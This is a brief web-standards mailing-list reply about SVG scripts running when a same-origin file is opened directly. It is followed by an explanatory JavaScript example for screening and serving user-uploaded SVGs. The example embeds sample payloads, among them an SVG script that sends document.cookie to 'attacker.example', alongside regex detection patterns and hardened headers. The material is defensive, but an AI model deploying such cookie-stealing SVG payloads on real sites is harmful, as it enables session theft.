On Wed, May 15, 2013 at 9:08 PM, Simon Pieters <[email protected]> wrote:
> Case study: <img> was historically not capable of executing script from an
> external file. This led to sites expecting <img> to be safe (e.g. allow
> untrusted comments to use <img>). When browsers wanted to support SVG in
> <img>, scripting had to be disabled in order to not break the assumption
> that <img> is safe.
Further case in point: hosting SVG same-origin is nevertheless still very much a no-no, as tricking the user into loading the file directly will expose the user to said scripts.

--
http://annevankesteren.nl/
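The distinction Anne draws above (an SVG that is harmless inside <img> but runs its script when the same URL is opened directly) is easy to reproduce. The block below is an added example written for this page, not code from the thread or from any browser vendor. It assumes a Node.js back end that stores user-uploaded SVGs; the function names (svgHasActiveContent, svgResponseHeaders, acceptSvgUpload), the "unsafeSameOrigin"/"hardened" mode names and the sample SVGs are all constructed for illustration. It shows the weak way of serving the file beside a hardened response that keeps <img> working while making a direct visit inert, plus a coarse reject-on-suspicion screen for active content.

```javascript
// Added example, not part of the original mailing-list thread.
// Assumes a Node.js service that stores user-supplied SVG files and serves
// them back on the site's own origin. All function and mode names below are
// hypothetical.

// Constructed sample: renders as a red square inside <img>, where browsers
// disable scripting, but the <script> executes with the hosting origin if the
// same URL is opened in a tab or loaded through <iframe>/<object>/<embed>.
const SCRIPTED_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="red"/>
  <script>location = "https://attacker.example/?c=" + document.cookie;</script>
</svg>`;

// Same payload via an event handler attribute instead of a <script> element.
const ONLOAD_SVG = `<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
  <rect width="10" height="10" fill="red"/>
</svg>`;

// Constructed benign sample with no active content.
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="red"/>
</svg>`;

// Coarse screening for active content in an uploaded SVG. Any match rejects
// the upload, so false positives are harmless; it is NOT a sanitizer and does
// not replace serving untrusted files from a separate origin.
function svgHasActiveContent(svgText) {
  const patterns = [
    /<\s*script\b/i,          // inline or external <script>
    /\son[a-z]+\s*=/i,        // event handler attributes: onload, onclick, ...
    /javascript\s*:/i,        // javascript: URLs in href / xlink:href
    /<\s*foreignObject\b/i,   // embeds HTML, which brings its own <script>
    /<\s*(set|animate)\b/i,   // SMIL can rewrite href/attributes at runtime
  ];
  return patterns.some((p) => p.test(svgText));
}

// Response headers for a stored SVG.
//  - "unsafeSameOrigin": plain image/svg+xml on the main origin. Works in
//    <img>, but a direct visit runs any script with the site's origin.
//  - "hardened": same Content-Type, so <img> still renders it, plus headers
//    that only matter when the file becomes a document of its own:
//      CSP "sandbox": the navigated/framed document gets an opaque origin and
//        no script execution;
//      default-src 'none': no sub-resource fetches;
//      nosniff: the response is not reinterpreted as another type;
//      Content-Disposition: attachment: a direct visit downloads instead of
//        rendering (ignored by <img>, so inline use is unaffected).
function svgResponseHeaders(mode) {
  const base = { "Content-Type": "image/svg+xml; charset=utf-8" };
  if (mode === "unsafeSameOrigin") return base;
  if (mode === "hardened") {
    return {
      ...base,
      "Content-Security-Policy": "sandbox; default-src 'none'",
      "X-Content-Type-Options": "nosniff",
      "Content-Disposition": 'attachment; filename="image.svg"',
    };
  }
  throw new Error(`unknown mode: ${mode}`);
}

// Upload gate: reject anything the screen flags, otherwise record the headers
// the file must be served with.
function acceptSvgUpload(svgText) {
  if (svgHasActiveContent(svgText)) {
    return { accepted: false, reason: "active content in SVG" };
  }
  return { accepted: true, headers: svgResponseHeaders("hardened") };
}

console.log(acceptSvgUpload(SCRIPTED_SVG));
console.log(acceptSvgUpload(ONLOAD_SVG));
console.log(acceptSvgUpload(BENIGN_SVG));
```

Even with the hardened headers, the file still lives on the application's origin, which is why a separate, cookieless origin for user content remains the primary control; the headers limit the damage if a direct link is ever followed, and the screen only catches the obvious cases.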
